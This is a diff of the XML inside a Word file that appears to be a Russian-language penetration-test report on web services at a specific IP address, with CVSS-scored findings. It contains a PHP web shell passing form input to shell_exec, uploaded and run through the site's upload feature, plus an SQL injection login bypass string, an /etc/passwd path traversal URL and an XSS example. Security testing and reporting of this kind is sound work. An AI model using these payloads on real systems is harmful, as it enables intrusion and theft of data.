+        <w:t xml:space="preserve">;"&gt;Перейти на сайт&lt;/a&gt; - </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">;"&gt;Перейти на сайт&lt;/a&gt; - </w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:ind w:firstLine="709"/>
         <w:rPr>
@@ -13193,7 +13190,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>Этот HTML-код создаст ссылку "Перейти на сайт", которая, когда будет щелкнута, вызовет всплывающее окно с вредоносным сообщением.</w:t>
+        <w:t>Этот HTML-код создаст ссылку "Перейти на с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>айт", которая</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> вызовет всплывающее окно с вредоносным сообщением.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13647,23 +13656,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13712,7 +13705,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13720,9 +13712,8 @@
           <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Scource</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>S</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13730,7 +13721,7 @@
           <w:bCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Code Disclosure - File Inclusion</w:t>
+        <w:t>ource Code Disclosure - File Inclusion</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -14109,23 +14100,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14172,6 +14147,28 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">На сайте есть возможность загрузки файлов. Загрузим </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>shell.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14179,9 +14176,33 @@
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;?</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14189,58 +14210,382 @@
         <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>if ($_SERVER['REQUEST_METHOD'] === 'POST') {</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $command = $_POST['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>'];</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $output = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>shell_exec</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>($command);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="18"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    echo "&lt;pre&gt;$output&lt;/pre&gt;";</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
-        <w:rPr>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&lt;form method="post"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    Command: &lt;input type="text" name="</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    &lt;input type="submit" value="Execute"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&lt;/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>form</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Запустим его - </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId61" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ad"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          </w:rPr>
+          <w:t>http://92.51.39.106:8060/upload</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="ad"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          </w:rPr>
+          <w:t>/</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>В списке директорий выберем нужный нам каталог</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">и запустим </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
       </w:pPr>
     </w:p>
     <w:p>
@@ -14256,7 +14601,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc158883775"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc158883775"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14265,7 +14610,7 @@
         </w:rPr>
         <w:t>Тестирование http://92.51.39.106:7799</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14317,7 +14662,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Внедрение SQL-кода это</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
@@ -14739,27 +15083,7 @@
                 <w:bCs/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14843,7 +15167,7 @@
         </w:rPr>
         <w:t xml:space="preserve">На сайте </w:t>
       </w:r>
-      <w:hyperlink r:id="rId61" w:tooltip="http://92.51.39.106:7799/server.html" w:history="1">
+      <w:hyperlink r:id="rId62" w:tooltip="http://92.51.39.106:7799/server.html" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ad"/>
@@ -14925,7 +15249,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14933,17 +15256,7 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>' or '1'='1—</w:t>
+        <w:t>admin' or '1'='1—</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15278,6 +15591,7 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>Вектор атаки (AV)</w:t>
             </w:r>
           </w:p>
@@ -15398,7 +15712,6 @@
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Взаимодействие с пользователем (UI)</w:t>
             </w:r>
           </w:p>
@@ -15628,23 +15941,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16222,23 +16519,7 @@
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -16287,6 +16568,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Уязвимость была протестирована автоматически во время сканирования ZAP.</w:t>
       </w:r>
     </w:p>
@@ -16338,7 +16620,7 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId62" w:tooltip="http://92.51.39.106:7799/read?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" w:history="1">
+      <w:hyperlink r:id="rId63" w:tooltip="http://92.51.39.106:7799/read?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="ad"/>
@@ -16995,27 +17277,7 @@
                 <w:bCs/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -17041,6 +17303,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
